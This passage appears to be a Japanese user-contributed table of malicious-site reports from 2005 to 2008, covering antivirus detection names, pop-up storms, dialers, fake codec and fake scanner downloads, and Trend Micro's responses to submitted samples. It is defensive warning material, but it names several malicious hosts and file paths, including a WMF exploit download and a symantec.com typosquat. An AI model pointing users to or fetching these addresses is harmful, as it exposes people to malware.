AntiVir → Trojan/Drop.Small.QN.3 ArcaVir → Trojan.Dropper.Small.Qn Avast → Win32:Trojano-1152 AVG Antivirus → Dropper.Generic.CHY BitDefender → Trojan.Dropper.Small.QN Dr.Web → Adware.Surfside Fortinet → Adware/Small Kaspersky Anti-Virus → Trojan-Dropper.Win32.Small.qn NOD32 → a variant of Win32/Adware.SurfSideKick application Norman Virus Control → W32/Smalldrp.FZC UNA → TrojanDropper.Win32.Small VBA32 → Trojan-Dropper.Win32.Small.qn |
| [2005/04/16] | バスターでウィルス反応は無いようだが、次々とアダルトサイトが開き、お気に入りに登録しろ、と連発する。窓を順次閉じていっても中々終わらない。 |
| [2007/04/15] | 再確認。海外アダルトサイト。Vista環境では無害と思われる。
他の方の結果は以下。 「有害サイトなどを次々開くポップアップストーム系の有害サイトのようです。プロセスから閉じて脱出」 |
| [2006/09/08] | 2006/09/02 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_GAMEC.BI として検出するよう対応、とのこと。 2006/09/02 にDLしたファイルからウィルス名:TSPY_GAMEC.BI を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとウィルス名:TROJ_DLOADER.DYP を検出する。 |
| [2006/06/25] | ウイルスバスターでは近いうちにウィルス名:TROJ_ZLOB.VX として対応する予定らしい。 |
| [2006/06/28] | トレンドマイクロ社から連絡あり。
「パターンファイル3.531.00 にて、ウィルス名:TROJ_ZLOB.ACO として検出するよう対応いたしました。」とのこと。 「svcodec-v4.59.exe」をDL後、ウィルスを検出することを確認。 |
| [2006/06/28] | AVG ではウィルス名:Downloader.Zlob.BGC を検出するらしい。 |
| [2006/07/10] | 2006/07/03 に「sv-codec-v4_01a.exe」をトレンドマイクロ社に提出。
2006/07/04 に連絡あり。ウイルスパターンファイル「3.549.00」よりウィルス名:TROJ_ZLOB.ABU として検出するよう対応したとのこと。 実際にウイルスバスターが「sv-codec-v4_01a.exe」に反応するかどうか確認すると、無反応。 再度、このURLで「sv-codec-v4_01a.exe」をDLし、トレンドマイクロ社に連絡、調査を依頼。 すると、トレンドマイクロ社から「sv-codec-v4_01a.exe」はどこのURLで入手したかを聞いてきたので、当URLを報告、調査してもらった。 そして今日、その報告があり。その内容は以下。 トレンドマイクロ・ウイルスバスタークラブセンターです。 弊社製品をご愛用いただき、誠にありがとうございます。 詳細な URL をお知らせいただき誠にありがとうございます。 お問い合わせいただいております件ですが、お客さまからご提供いただいた「sv-codec-v4_01a.exe」の解析を行わせていただたく前に、お知らせいただいた URL から最新の「sv-codec-v4_01a.exe」を入手し、解析を行わせていただきました。 最新の「sv-codec-v4_01a.exe」の解析を行ったところ、さらに新しいファイルと入れ替わっていることが判明し、新しく入手したファイルをウイルスパターンファイルの「3.553.00」より「TROJ_ZLOB.AHA」として検出、対応いたしました。 上記のことから、該当の URL では不正と思われるファイルが、新しいファイルに随時置き換わる URL と推測されます。 次々に新しい不正なファイルに置き換えられることから、お知らせいただいた URL にはアクセスされないよう推奨いたします。 今日[2006/07/10 21:30]時点で、「sv-codec-v4_01a.exe」をDLし、ウィルスを検出するか確認( パターンファイル「3.559.00」)。 すると、早くもファイルが置き換えられてしまったのか、バスターは無反応であった。 また、「sv-codec-v4_01a.exe」は以下のアンチウィルスソフトでも反応する。 AntiVir → TR/Drop.Zlob.VX.1 TheHacker → Posible_Worm32 |
| [2008/08/26] | ウィルス名:TSC_GENCLEAN+TROJ_EXCHANGE.AF |
| [2005/02/24] | 解凍すると「Dialneta012.exe」が出来る。バスター無反応だがAntiVirでダイヤラー名:DIAL/Generic dialer を検出。 |
| [2006/08/06] | 再確認。ウィルス名:DIAL_PINKYB.A |
| [2005/09/19] | 踏むと海外アダルトサイト。ウィンドウサイズを変更されることもあるらしいが、私の環境では確認出来なかった。
閉じると大きいサイズの海外アダルトサイトが開き、ポップアップブロックでも閉じない。 閉じても閉じても開き、時間が経っても増えていく。プロセスからIEを強制終了で脱出。 また、閉じても閉じても開くウィンドウはアドレスバーが無い。 参考://ohi-ahi.com/ も同様な症状。 この症状は //2hmr.biz/adverts/adv.php を呼んでくるために起きる。 |
| [2005/04/13] | ウィルス名:JAVA_BYTEVER.A。閉じるとアダルトサイト新窓表示、それを閉じると更に新窓表示、更にそれを閉じると更に新窓表示。 |
| [2006/01/12] | ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y 。「as.wmf」をDLしろ、と言ってくる。
ソースを見ると、Location ヘッダで、以下の @ に飛び、更に A に飛ぶ。 @、//1800-search.com/closed.php A、//1800-search.com/as.wmf |
| [2005/09/21] | シマンテック社のURLと酷似(//www.symantec.com/)。踏んだ結果は//symantic.com/と同じである。
踏むと以下の 1. → 2. → 3. の順に飛んでいく。
3. の画面中央の「 Click Here ! 」をクリックすると これ を表示し、以下の 5. をDL出来るが、ウィルス名:TROJ_PROXY.BT を検出。
その後、これ を表示し、クリックしてもしなくても上記の 5. をDLするよう求められる。 他の方の結果は以下。 「ErrorSafe」という怪しいオンラインスキャンサイトページに行きました。ActiveXのインストールを促されます。 キャンセルすると英語で「感染ファイルが59もあるぞ」と表示され、閉じてもアラートで感染どうのこうののアラートが2回表示されます。 それを閉じると更に小窓が開き、「ErrorSafeScannerInstall.exe」というファイルを捻じ込もうとしてきました。 そのファイルのオンラインスキャンの結果、Downloader.Win32.Agent.d:スパイウェアの類のようです。 |
| [2008/10/05] | ウィルス名:TSPY_ONLINEG.LMM |
| [2008/10/05] | ウィルス名:TROJ_INJECT.EU |